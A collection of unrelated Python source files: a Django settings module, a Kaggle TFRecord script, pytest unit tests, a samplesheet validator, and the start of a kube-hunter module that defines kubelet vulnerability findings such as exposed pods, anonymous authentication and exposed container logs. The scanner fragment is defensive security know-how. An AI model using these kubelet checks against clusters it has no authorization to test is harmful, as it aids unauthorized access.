payload["state"] = (1 if args.status == "Enabled" else 0)
if args.non_secure_port is not None:
if (payload.get("non_secure_port", None) is None or payload.get(
"non_secure_port", None) == -1):
err_info = ("Argument: invalid choice: %s (parameter not "
"available)" % args.non_secure_port)
self.err_list.append(err_info)
else:
payload["non_secure_port"] = args.non_secure_port
if args.secure_port is not None:
if (payload.get("secure_port", None) is None or payload.get(
"secure_port", None) == -1):
err_info = ("Argument: invalid choice: %s (parameter not "
"available)" % args.secure_port)
self.err_list.append(err_info)
else:
payload["secure_port"] = args.secure_port
if args.timeout is not None:
if args.timeout < 5 or args.timeout > 30:
err_info = ("Argument: invalid choice: %s (choose from 5 to "
"30)" % args.timeout)
self.err_list.append(err_info)
else:
payload["time_out"] = args.timeout * 60
url = "%s/%s" % (url, payload.get("id"))
if self.err_list:
raise FailException(*self.err_list)
return url, payload
| StarcoderdataPython |
9685787 | <reponame>alexdlaird/twilio-taskrouter-demo
"""
Settings common to all deployment methods.
"""
import os
import socket
from conf.settings import PROJECT_ID
__author__ = '<NAME>'
__copyright__ = 'Copyright 2018, <NAME>'
__version__ = '0.2.1'
# Define the base working directory of the application
BASE_DIR = os.path.normpath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', '..'))
# ############################
# Project configuration
# ############################
# Project information
PROJECT_NAME = os.environ.get('TWILTWIL_NAME')
PROJECT_HOST = os.environ.get('TWILTWIL_HOST')
# Version information
PROJECT_VERSION = __version__
#############################
# Default lists for host-specific configurations
#############################
INSTALLED_APPS = (
# Django modules
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.sitemaps',
# Third-party modules
'pipeline',
'widget_tweaks',
'rest_framework',
# Project modules
'twiltwil.common',
'twiltwil.auth',
'twiltwil.portal',
'twiltwil.api',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'twiltwil.common.handlers.processors.template',
],
'debug': os.environ.get('TWILTWIL_TEMPLATE_DEBUG', 'False') == 'True'
},
}]
#############################
# Django configuration
#############################
# Application definition
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
AUTH_USER_MODEL = 'twiltwil_auth.User'
LOGIN_URL = '/'
LOGOUT_URL = '/logout'
ROOT_URLCONF = 'conf.urls'
WSGI_APPLICATION = 'conf.wsgi.application'
HOSTNAME = socket.gethostname()
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_THOUSAND_SEPARATOR = True
USE_TZ = True
HE_DATE_STRING = "%Y-%m-%d"
HE_TIME_STRING = "%H:%M:%S"
HE_DATE_TIME_STRING = HE_DATE_STRING + " " + HE_TIME_STRING
# Email settings
ADMIN_EMAIL_ADDRESS = os.environ.get('TWILTWIL_ADMIN_EMAIL')
SERVER_EMAIL = ADMIN_EMAIL_ADDRESS
EMAIL_USE_TLS = os.environ.get('TWILTWIL_EMAIL_USE_TLS', 'True') == 'True'
EMAIL_PORT = os.environ.get('TWILTWIL_EMAIL_PORT')
EMAIL_ADDRESS = os.environ.get('TWILTWIL_CONTACT_EMAIL')
DEFAULT_FROM_EMAIL = f'{PROJECT_NAME} <{EMAIL_ADDRESS}>'
EMAIL_HOST = os.environ.get('TWILTWIL_EMAIL_HOST')
EMAIL_HOST_USER = os.environ.get('TWILTWIL_EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('TWILTWIL_EMAIL_HOST_PASSWORD')
# Authentication
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Security
SECRET_KEY = os.environ.get('TWILTWIL_SECRET_KEY')
CSRF_COOKIE_SECURE = os.environ.get('TWILTWIL_CSRF_COOKIE_SECURE', 'True') == 'True'
SESSION_COOKIE_SECURE = os.environ.get('TWILTWIL_SESSION_COOKIE_SECURE', 'True') == 'True'
ALLOWED_HOSTS = os.environ.get('TWILTWIL_ALLOWED_HOSTS').split(' ')
CSRF_MIDDLEWARE_SECRET = os.environ.get('TWILTWIL_CSRF_MIDDLEWARE_SECRET')
# Logging
DEBUG = os.environ.get('TWILTWIL_DEBUG', 'False') == 'True'
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder',
)
# Media files
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Pipelines
PIPELINE = {
'DISABLE_WRAPPER': True,
'STYLESHEETS': {
'base': {
'source_filenames': (
'css/base.css',
),
'output_filename': f'css/{PROJECT_ID}_base_{PROJECT_VERSION}.min.css'
},
'portal': {
'source_filenames': (
'css/portal.css',
),
'output_filename': f'css/{PROJECT_ID}_portal_{PROJECT_VERSION}.min.css'
},
},
'JAVASCRIPT': {
'portal': {
'source_filenames': (
'js/api.js',
'js/portal.js',
),
'output_filename': f'js/{PROJECT_ID}_portal_{PROJECT_VERSION}.min.js'
},
}
}
# Twilio
TWILIO_ACCOUNT_SID = os.environ.get('TWILTWIL_TWILIO_ACCOUNT_SID')
TWILIO_AUTH_TOKEN = os.environ.get('TWILTWIL_TWILIO_AUTH_TOKEN')
TWILIO_PHONE_NUMBER = os.environ.get('TWILTWIL_TWILIO_PHONE_NUMBER')
TWILIO_API_KEY = os.environ.get('TWILTWIL_TWILIO_API_KEY')
TWILIO_API_SECRET = os.environ.get('TWILTWIL_TWILIO_API_SECRET')
TWILIO_API_BASE_URL = os.environ.get('TWILTWIL_TWILIO_API_BASE_URL', None)
TWILIO_EVENT_BRIDGE_BASE_URL = os.environ.get('TWILTWIL_TWILIO_EVENT_BRIDGE_BASE_URL', None)
TWILIO_REGION = os.environ.get('TWILTWIL_TWILIO_REGION', None)
# Other
DISABLE_LOBBY_VIDEO = os.environ.get('TWILTWIL_DISABLE_LOBBY_VIDEO', 'False') == 'True'
MAX_HTTP_RETRIES = os.environ.get('TWILTWIL_MAX_HTTP_RETRIES', 5)
| StarcoderdataPython |
372958 | # Import Modules
import gc
import numpy as np
import pandas as pd
import shutil
import tensorflow as tf
from utils import *
from tqdm import tqdm
# Constants
patch_size = 1024
generate_stage2 = False # Generate Stage 1 ... OR ... Generate Stage 2 based on Pseudo Labelling
# Required Folders - Modify these if required to fit your local folder structure
root_dir = 'C:/KaggleHuBMAP/'
train_data_dir = f'{root_dir}train/' # Folder for official Kaggle HuBMAP Train Data
test_data_dir = f'{root_dir}test/' # Folder for official Kaggle HuBMAP Test Data. Used for Pseudo Labelling Stage2
ext1_data_dir = f'{root_dir}ext1/' # Folder with External data from: https://www.kaggle.com/baesiann/glomeruli-hubmap-external-1024x1024
ext2_data_dir = f'{root_dir}ext2/' # Folder with External data from: https://portal.hubmapconsortium.org/search?entity_type%5B0%5D=Dataset
tfrecords_dir = f'{root_dir}tfrecords/' # Output directory for created TFRecords
tfrecords_train_dir = f'{tfrecords_dir}train/'
tfrecords_test_dir = f'{tfrecords_dir}test/'
tfrecords_ext1_dir = f'{tfrecords_dir}ext1/'
tfrecords_ext2_dir = f'{tfrecords_dir}ext2/'
# Prepare TFRecords and Dataset Output Dir
clean_and_prepare_dir(tfrecords_dir)
# Only generate stage 1 train files
if not generate_stage2:
clean_and_prepare_dir(tfrecords_train_dir)
clean_and_prepare_dir(tfrecords_ext1_dir)
# Only generate stage 2 train files
else:
clean_and_prepare_dir(tfrecords_test_dir)
clean_and_prepare_dir(tfrecords_ext2_dir)
#### STAGE 1 ###########################################################################################################################
# Only generate stage 1 train files
if not generate_stage2:
#### Prepare and Process official Kaggle Train Images ##############################################################################
# Read Train Info
train_df = pd.read_csv(f'{root_dir}train.csv')
print(train_df.shape)
# Loop through all Train Images
train_image_count = train_df.shape[0]
for image_index in tqdm(range(train_image_count), total = train_image_count):
# Get Image ID
image_id = train_df['id'][image_index]
# Get TIFF Image
image = get_tiff_image(f'{train_data_dir}{image_id}.tiff')
# Get Mask
mask = rle2mask(train_df['encoding'][image_index], (image.shape[1], image.shape[0]))
# Create Patches and TFRecords for TIFF Image
patch_df = write_tfrecord_tiles_v1(image_id, image, mask, patch_size, tfrecords_train_dir)
# Create Dataframe
patch_df.to_csv(f'{tfrecords_train_dir}{image_id}_patches.csv', index = False)
# Clean Memory
gc.collect()
#### Prepare and Process First External Dataset Images #############################################################################
# List Images
ext1_images = os.listdir(f'{ext1_data_dir}images_1024/')
# Create
patch_df = write_tfrecord_tiles_v2(ext1_images, ext1_data_dir, tfrecords_ext1_dir)
# Create Dataframe
patch_df.to_csv(f'{tfrecords_ext1_dir}ext1_patches.csv', index = False)
# Clean Memory
gc.collect()
#### Create Final Zip File for upload to Kaggle Datasets ###############################################################################
shutil.make_archive(f'{root_dir}train_files_stage1', 'zip', root_dir = tfrecords_dir, base_dir = './')
#### STAGE 2 ###########################################################################################################################
# Only generate stage 2 train files
if generate_stage2:
#### Prepare and Process official Kaggle Test Images ##############################################################################
# Read Pseudo Label Info for Public Test.
# Pseudo Label public test data by using a selected ensemble of models and perform inference based on the public test data
# The generated predictions .csv file contains the masks for public test data. We can re-use these as additional training data
test_df = pd.read_csv(f'{root_dir}pseudolabel_test.csv')
print(test_df.shape)
# Loop through all public Test Images
test_image_count = test_df.shape[0]
for image_index in tqdm(range(test_image_count), total = test_image_count):
# Get Image ID
image_id = test_df['id'][image_index]
# Get TIFF Image
image = get_tiff_image(f'{test_data_dir}{image_id}.tiff')
# Get Mask
mask = rle2mask(test_df['predicted'][image_index], (image.shape[1], image.shape[0]))
# Create Patches and TFRecords for TIFF Image
patch_df = write_tfrecord_tiles_v1(image_id, image, mask, patch_size, tfrecords_test_dir)
# Create Dataframe
patch_df.to_csv(f'{tfrecords_test_dir}{image_id}_patches.csv', index = False)
# Clean Memory
gc.collect()
#### Prepare and Process Second External Dataset Images #############################################################################
# Pseudo Label second external dataset by using a selected ensemble of models and perform inference on the data
# The generated predictions .csv file contains the predicted masks for the second external data set. We can re-use these as additional training data
ext2_df = pd.read_csv(f'{root_dir}pseudolabel_ext2.csv')
print(ext2_df.shape)
# Loop through all second external data set images
ext2_image_count = ext2_df.shape[0]
for image_index in tqdm(range(ext2_image_count), total = ext2_image_count):
# Get Image ID
image_id = ext2_df['id'][image_index]
# Get TIFF Image
image = get_tiff_image(f'{ext2_data_dir}{image_id}.tiff')
# Get Mask
mask = rle2mask(ext2_df['predicted'][image_index], (image.shape[1], image.shape[0]))
# Create Patches and TFRecords for TIFF Image
patch_df = write_tfrecord_tiles_v1(image_id, image, mask, patch_size, tfrecords_ext2_dir)
# Create Dataframe
patch_df.to_csv(f'{tfrecords_ext2_dir}{image_id}_patches.csv', index = False)
# Clean Memory
gc.collect()
#### Create Final Zip File for upload to Kaggle Datasets ###############################################################################
shutil.make_archive(f'{root_dir}train_files_stage2', 'zip', root_dir = tfrecords_dir, base_dir = './')
# Final
print('=== Finished Training Files Processing') | StarcoderdataPython |
9654597 | <reponame>mano8/utils<gh_stars>0
# -*- coding: utf-8 -*-
"""
UType unittest class.
Use pytest package.
"""
import pytest
from ve_utils.utype import UType as Ut
class TestUType:
"""UTime unittest class."""
def test_has_valid_length(self):
"""Test has_valid_length method"""
assert Ut.has_valid_length(test=True, value='tst')
assert Ut.has_valid_length(test=True, value='tst', not_null=True)
assert Ut.has_valid_length(test=True, value='tst', mini=1, maxi=3)
assert Ut.has_valid_length(test=True, value='tst', mini=3, maxi=3)
assert Ut.has_valid_length(test=True, value='tst', eq=3, mini=4, maxi=6)
assert not Ut.has_valid_length(test=True, value='', not_null=True)
assert not Ut.has_valid_length(test=True, value='', mini=1)
assert not Ut.has_valid_length(test=True, value='aaa', maxi=1)
assert not Ut.has_valid_length(test=False, value='tst')
with pytest.raises(AttributeError):
Ut.has_valid_length(test=True, value='tst', mini=-1, maxi=2)
with pytest.raises(AttributeError):
Ut.has_valid_length(test=False, value='tst', mini=-1, maxi=2)
with pytest.raises(AttributeError):
Ut.has_valid_length(test=False, value='tst', mini=0, maxi=0)
with pytest.raises(AttributeError):
Ut.has_valid_length(test=False, value='tst', mini=5, maxi=2)
with pytest.raises(AttributeError):
Ut.has_valid_length(test=False, value='tst', eq=-1)
with pytest.raises(TypeError):
assert Ut.has_valid_length(test=True, value=None, not_null=True)
def test_has_valid_value(self):
"""Test has_valid_value method"""
assert Ut.has_valid_value(test=True, value=1)
assert Ut.has_valid_value(test=True, value=-2, not_null=True)
assert Ut.has_valid_value(test=True, value=1, mini=1, maxi=3)
assert Ut.has_valid_value(test=True, value=3, mini=3, maxi=3)
assert Ut.has_valid_value(test=True, value=3, eq=3)
assert Ut.has_valid_value(test=True, value=3, positive=True)
assert Ut.has_valid_value(test=True, value=-3, negative=True)
assert not Ut.has_valid_value(test=True, value=0, not_null=True)
assert not Ut.has_valid_value(test=True, value=-1, mini=1)
assert not Ut.has_valid_value(test=True, value=2, maxi=1)
assert not Ut.has_valid_value(test=True, value=2, eq=1)
assert not Ut.has_valid_value(test=True, value=0, positive=True)
assert not Ut.has_valid_value(test=True, value=-1, positive=True)
assert not Ut.has_valid_value(test=True, value=0, negative=True)
assert not Ut.has_valid_value(test=True, value=2, negative=True)
assert not Ut.has_valid_value(test=False, value=1)
with pytest.raises(AttributeError):
Ut.has_valid_value(test=True, value=3, eq=3, mini=-1, maxi=2)
with pytest.raises(AttributeError):
Ut.has_valid_value(test=False, value=3, eq=3, maxi=2)
with pytest.raises(AttributeError):
Ut.has_valid_value(test=False, value=3, eq=3, mini=2)
with pytest.raises(AttributeError):
Ut.has_valid_value(test=False, value=3, eq=-3, not_null=True)
with pytest.raises(AttributeError):
Ut.has_valid_value(test=False, value=3, mini=5, maxi=2)
with pytest.raises(TypeError):
Ut.has_valid_value(test=True, value='tst', mini=-1)
with pytest.raises(TypeError):
assert Ut.has_valid_value(test=True, value=None, maxi=2)
def test_is_str(self):
"""Test is_str method"""
datas = [
'_hy', 'hy', "#hj_58 Hyufdgdfi#", "hj_58Hyui", "", # true
-1, True, dict(), list(), None # false
]
tests = [x for x in datas if Ut.is_str(value=x, mini=3, maxi=10)]
assert len(tests) == 2
tests = [x for x in datas if Ut.is_str(value=x, not_null=True, maxi=10)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_str(value=x, not_null=True)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_valid_format(value=x, data_type='str', not_null=True)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_valid_format(value=x, data_type=str)]
assert len(tests) == 5
def test_is_bool(self):
"""Test is_bool method"""
datas = [
True, False, # true
0, 1, "hello", dict(), list() # false
]
tests = [x for x in datas if Ut.is_bool(x)]
assert len(tests) == 2
tests = [x for x in datas if Ut.is_valid_format(x, data_type='bool')]
assert len(tests) == 2
tests = [x for x in datas if Ut.is_valid_format(x, data_type=bool)]
assert len(tests) == 2
def test_is_int(self):
"""Test is_int method"""
datas = [
0, 0x235, -999999999999999999999999999999999999999999999999999999, 5,
-2, -6, True, False, # true
'_hello', dict(), list(), 0.1 # false
]
tests = [x for x in datas if Ut.is_int(value=x, not_null=True, mini=-3, maxi=10)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_int(value=x, mini=-3, maxi=10)]
assert len(tests) == 5
tests = [x for x in datas if Ut.is_int(value=x, maxi=10)]
assert len(tests) == 7
tests = [x for x in datas if Ut.is_int(value=x, mini=-6)]
assert len(tests) == 7
tests = [x for x in datas if Ut.is_valid_format(x, data_type=int, mini=-3, maxi=10)]
assert len(tests) == 5
tests = [x for x in datas if Ut.is_valid_format(x, data_type='int')]
assert len(tests) == 8
def test_is_float(self):
"""Test is_float method"""
datas = [
0.0, -100.1, -999999999999999999999999999999999999999999999999999999.2, # true
5.1, -2.6, -6.5,
'_hello', True, dict(), list(), 0 # false
]
tests = [x for x in datas if Ut.is_float(value=x, not_null=True, mini=-100.1, maxi=10)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_float(value=x, mini=-6.5, maxi=5.1)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_float(value=x, maxi=5)]
assert len(tests) == 5
tests = [x for x in datas if Ut.is_float(value=x, mini=-6.5)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_valid_format(x, data_type=float, mini=-6.5)]
assert len(tests) == 4
tests = [x for x in datas if Ut.is_valid_format(x, data_type='float')]
assert len(tests) == 6
def test_is_numeric(self):
"""Test is_numeric method"""
datas = [
0, 0x235, -999999999999999999999999999999999999999999999999999999, 5, # true
-2, -6, True, False, # true
0.0, -100.1, -999999999999999999999999999999999999999999999999999999.2, # true
5.1, -2.6, -6.5,
'_hello', dict(), list() # false
]
tests = [x for x in datas if Ut.is_numeric(value=x, not_null=True, mini=-100.1, maxi=10)]
assert len(tests) == 8
tests = [x for x in datas if Ut.is_numeric(value=x, mini=-6.5, maxi=5.1)]
assert len(tests) == 10
tests = [x for x in datas if Ut.is_numeric(value=x, not_null=True, mini=-3, maxi=10)]
assert len(tests) == 5
tests = [x for x in datas if Ut.is_numeric(value=x, mini=-3, maxi=10)]
assert len(tests) == 8
tests = [x for x in datas if Ut.is_valid_format(x, data_type='numeric', mini=-3, maxi=10)]
assert len(tests) == 8
tests = [x for x in datas if Ut.is_valid_format(x, data_type='numeric')]
assert len(tests) == 14
def test_is_dict(self):
"""Test is_dict method"""
datas = [
dict(), {0: "0", 1: "1", 2: "2", 3: "3"}, {"a": "0", "b": "0"}, {(1, 0): "0"}, # true
0.0, 1.1, "hello", tuple(), list() # false
]
tests = [x for x in datas if Ut.is_dict(x, not_null=True, min_items=1)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_dict(x, not_null=True, min_items=2)]
assert len(tests) == 2
tests = [x for x in datas if Ut.is_dict(x, min_items=1, max_items=2)]
assert len(tests) == 2
with pytest.raises(AttributeError):
Ut.is_dict({}, min_items=-1, max_items=2)
tests = [x for x in datas if Ut.is_valid_format(x, data_type=dict, not_null=True)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_valid_format(x, data_type='dict')]
assert len(tests) == 4
def test_is_tuple(self):
""""""
datas = [
tuple(), (0, 1, 2), (0, 1, 2, 3), ('a', 'b'), # true
0.0, 1.1, "hello", list(), dict() # false
]
tests = [x for x in datas if Ut.is_tuple(x, not_null=True, min_items=2)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_tuple(x, min_items=3)]
assert len(tests) == 2
tests = [x for x in datas if Ut.is_tuple(x, max_items=3)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_valid_format(x, data_type=tuple, not_null=True)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_valid_format(x, data_type='tuple')]
assert len(tests) == 4
def test_is_list(self):
"""Test is_list method"""
datas = [
list(), [0, 1, 2, 3, 4], [1, "0"], [(1, 0), "0"], # true
0.0, 1.1, "hello", tuple(), dict() # false
]
tests = [x for x in datas if Ut.is_list(x, max_items=3)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_list(x, min_items=3)]
assert len(tests) == 1
tests = [x for x in datas if Ut.is_valid_format(x, data_type=list, not_null=True)]
assert len(tests) == 3
tests = [x for x in datas if Ut.is_valid_format(x, data_type='list')]
assert len(tests) == 4
def test_is_valid_format(self):
"""Test is_valid_format method"""
with pytest.raises(AttributeError):
Ut.is_valid_format({}, data_type="bad data type")
assert Ut.is_list(Ut.get_valid_data_types_test())
def test_get_int(self):
"""Test get_int method"""
assert Ut.get_int("hello", 0) == 0
assert Ut.get_int(0.1) == 0
assert Ut.get_int("bg", 2) == 2
assert Ut.get_int(True) == 1
assert Ut.get_int([]) == 0
def test_get_float(self):
"""Test get_float method"""
assert Ut.get_float("hello", 0.0) == 0.0
assert Ut.get_float(0.1) == 0.1
assert Ut.get_float("bg", 2.5) == 2.5
assert Ut.get_float(True) == 1.0
assert Ut.get_float([]) == 0.0
def test_get_rounded_float(self):
"""Test get_rounded_float method"""
assert Ut.get_rounded_float("hello", 1, 0.156) == 0.0
assert Ut.get_rounded_float(0.1665616, 3) == 0.167
assert Ut.get_rounded_float("bg", 2, 2.589898) == 0.0
assert Ut.get_rounded_float(None, dict(), None) is None
def test_get_str(self):
"""Test get_str method"""
assert Ut.get_str("hello") == "hello"
assert Ut.get_str(0.1665616) == "0.1665616"
assert Ut.get_str(10) == "10"
def test_format_by_type(self):
"""Test format_by_type method"""
assert Ut.format_by_type("32", 'int') == 32
assert Ut.format_by_type("32", 'float') == 32.0
assert Ut.format_by_type(32, 'str') == '32'
assert Ut.format_by_type(1, 'bool') is True
assert Ut.format_by_type(True, 'onOff') == 'On'
assert Ut.format_by_type(False, 'onOff') == 'Off'
assert Ut.format_by_type(True, 'intBool') == 1
assert Ut.format_by_type(False, 'intBool') == 0
assert Ut.format_by_type(1.25698789, 'float', 3) == 1.257
assert Ut.format_by_type(8, 'intString') == "08"
assert Ut.format_by_type(10, 'intString') == "10"
with pytest.raises(AttributeError):
Ut.format_by_type({}, data_type="bad data type")
def test_int_to_formatted_string(self):
"""Test int_to_formatted_string method"""
assert Ut.int_to_formatted_string(0) == "00"
assert Ut.int_to_formatted_string(5) == "05"
assert Ut.int_to_formatted_string(10) == "10"
assert Ut.int_to_formatted_string(125) == "125"
assert Ut.int_to_formatted_string("bad") is None
assert Ut.int_to_formatted_string("bad", False) is False
def test_str_to_bool(self):
"""Test str_to_bool method"""
assert Ut.str_to_bool("true")
assert Ut.str_to_bool("1")
assert Ut.str_to_bool("On")
assert Ut.str_to_bool("Ok")
assert Ut.str_to_bool(1)
assert Ut.str_to_bool(True)
assert not Ut.str_to_bool("False")
assert not Ut.str_to_bool("0")
assert not Ut.str_to_bool("Off")
assert not Ut.str_to_bool("Error")
assert not Ut.str_to_bool(0)
assert not Ut.str_to_bool(False)
assert Ut.str_to_bool(None, None) is None
def test_bool_to_int_text(self):
"""Test bool_to_int_text method"""
assert Ut.bool_to_int_text(True) == "1"
assert Ut.bool_to_int_text(False) == "0"
def test_bool_to_on_off(self):
"""Test bool_to_on_off method"""
assert Ut.bool_to_on_off(True) == "On"
assert Ut.bool_to_on_off(False) == "Off"
def test_bool_to_str_state(self):
"""Test bool_to_str_state method"""
assert Ut.bool_to_str_state(True) == "Ok"
assert Ut.bool_to_str_state(False) == "Error"
def test_string_to_int_bool(self):
"""Test string_to_int_bool method"""
assert Ut.string_to_int_bool(True) == 1
assert Ut.string_to_int_bool(False) == 0
def test_string_to_float(self):
"""Test string_to_float method"""
assert Ut.string_to_float('0,125') == 0.125
assert Ut.string_to_float('0.125') == 0.125
assert Ut.string_to_float(0.125) == 0.125
assert Ut.string_to_float(None, None) is None
def test_init_dict(self):
"""Test init_dict method"""
assert Ut.init_dict('0,125') == dict()
assert Ut.init_dict({'a': 0}) == {'a': 0}
def test_init_dict_key(self):
"""Test init_dict_key method"""
assert Ut.init_dict_key(dict(), 'my_key', list()) == {'my_key': list()}
assert Ut.init_dict_key(dict(), 'my_key', dict()) == {'my_key': dict()}
with pytest.raises(ValueError):
assert Ut.init_dict_key(dict(), None, dict())
def test_get_items_from_dict(self):
"""Test init_dict_key method"""
data = {
'a': 0, 'b': 1, 'c': 2
}
assert Ut.get_items_from_dict(data, ['a']) == {'a': 0}
assert Ut.get_items_from_dict(data, ['a', 'c']) == {'a': 0, 'c': 2}
| StarcoderdataPython |
6531453 | <filename>bin/check_samplesheet.py
#!/usr/bin/env python
# This script is based on the example at: https://raw.githubusercontent.com/nf-core/test-datasets/viralrecon/samplesheet/samplesheet_test_illumina_amplicon.csv
import os
import sys
import errno
import argparse
def parse_args(args=None):
Description = "Reformat nf-core/mhcquant samplesheet file and check its contents."
Epilog = "Example usage: python check_samplesheet.py <FILE_IN> <FILE_OUT>"
parser = argparse.ArgumentParser(description=Description, epilog=Epilog)
parser.add_argument("FILE_IN", help="Input samplesheet file.")
parser.add_argument("FILE_OUT", help="Output file.")
return parser.parse_args(args)
def make_dir(path):
if len(path) > 0:
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise exception
def print_error(error, context="Line", context_str=""):
error_str = "ERROR: Please check samplesheet -> {}".format(error)
if context != "" and context_str != "":
error_str = "ERROR: Please check samplesheet -> {}\n{}: '{}'".format(
error, context.strip(), context_str.strip()
)
print(error_str)
sys.exit(1)
def check_samplesheet(file_in, file_out):
"""
This function checks that the samplesheet follows the following structure:
ID\tSample\tCondition\tReplicateFileName
1\tWT\tA\tWT_A.raw
2\tWT\tB\tWT_B.raw
3\tKO\tA\tKO_A.raw
4\tKO\tB\tKO_B.raw
"""
sample_run_dict = {}
with open(file_in, "r") as fin:
## Check header
MIN_COLS = 4
HEADER = ["ID", "Sample", "Condition", "ReplicateFileName"]
header = [x.strip('"') for x in fin.readline().strip().split("\t")]
if header[: len(HEADER)] != HEADER:
print("ERROR: Please check samplesheet header -> {} != {}".format("\t".join(header), "\t".join(HEADER)))
sys.exit(1)
## Check sample entries
for line in fin:
lspl = [x.strip().strip('"') for x in line.strip().split("\t")]
## Check valid number of columns per row
if len(lspl) < len(HEADER):
print_error(
"Invalid number of columns (minimum = {})!".format(len(HEADER)),
"Line",
line,
)
num_cols = len([x for x in lspl if x])
if num_cols < MIN_COLS:
print_error(
"Invalid number of populated columns (minimum = {})!".format(MIN_COLS),
"Line",
line,
)
## Check sample name entries
ident, sample, condition, filename = lspl[: len(HEADER)]
# sample, condition, filename = lspl[1: len(HEADER)]
## Check replicate entry is integer
if not ident.isdigit():
ident = int(ident)
# identifier = sample + "_" + condition + "_" + ident
identifier = ident
for strCon in [sample, condition]:
if strCon:
if strCon.find(" ") != -1:
print_error("Group entry contains spaces!", "Line", line)
else:
print_error("Group entry has not been specified!", "Line", line)
## Check MS file extension
if filename:
if filename.find(" ") != -1:
print_error("FastQ file contains spaces!", "Line", line)
if not filename.endswith(".raw") and not filename.endswith(".mzML"):
print_error(
"FastQ file does not have extension '.raw' or '.mzML'!",
"Line",
line,
)
elif filename.endswith(".raw"):
sample_info = [sample, condition, filename, "raw"]
elif filename.lower().endswith(".mzml"):
sample_info = [sample, condition, filename, "mzml"]
## Create sample mapping dictionary = {sample: [[ single_end, fastq_1, fastq_2, strandedness ]]}
if sample not in sample_run_dict:
sample_run_dict[identifier] = [sample_info]
else:
if sample_info in sample_run_dict[identifier]:
print_error("Samplesheet contains duplicate rows!", "Line", line)
else:
sample_run_dict[identifier].append(sample_info)
## Write validated samplesheet with appropriate columns
if len(sample_run_dict) > 0:
out_dir = os.path.dirname(file_out)
make_dir(out_dir)
with open(file_out, "w") as fout:
fout.write("\t".join(["ID", "Sample", "Condition", "Filename", "FileExt"]) + "\n")
for sample in sorted(sample_run_dict.keys()):
for idx, val in enumerate(sample_run_dict[sample]):
fout.write("\t".join([sample] + val) + "\n")
def main(args=None):
args = parse_args(args)
check_samplesheet(args.FILE_IN, args.FILE_OUT)
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
4822569 | <reponame>zangobot/secml<filename>src/secml/parallel/__init__.py
from .parfor import parfor, parfor2
| StarcoderdataPython |
78272 | <reponame>PhilippGoecke/kube-hunter
import json
import logging
import time
from enum import Enum
import re
import requests
import urllib3
import uuid
from kube_hunter.conf import get_config
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import (
Hunter,
ActiveHunter,
KubernetesCluster,
Kubelet,
ExposedSensitiveInterfacesTechnique,
ExecIntoContainerTechnique,
GeneralDefenseEvasionTechnique,
GeneralSensitiveInformationTechnique,
PrivilegedContainerTechnique,
AccessKubeletAPITechnique,
)
from kube_hunter.modules.discovery.kubelet import (
ReadOnlyKubeletEvent,
SecureKubeletEvent,
)
logger = logging.getLogger(__name__)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ExposedPodsHandler(Vulnerability, Event):
"""An attacker could view sensitive information about pods that are
bound to a Node using the /pods endpoint"""
def __init__(self, pods):
Vulnerability.__init__(
self, component=Kubelet, name="Exposed Pods", category=AccessKubeletAPITechnique, vid="KHV052"
)
self.pods = pods
self.evidence = f"count: {len(self.pods)}"
class AnonymousAuthEnabled(Vulnerability, Event):
"""The kubelet is misconfigured, potentially allowing secure access to all requests on the kubelet,
without the need to authenticate"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Anonymous Authentication",
category=ExposedSensitiveInterfacesTechnique,
vid="KHV036",
)
class ExposedContainerLogsHandler(Vulnerability, Event):
"""Output logs from a running container are using the exposed /containerLogs endpoint"""
def __init__(self):
Vulnerability.__init__(
self,
component=Kubelet,
name="Exposed Container Logs",
category=AccessKubeletAPITechnique,
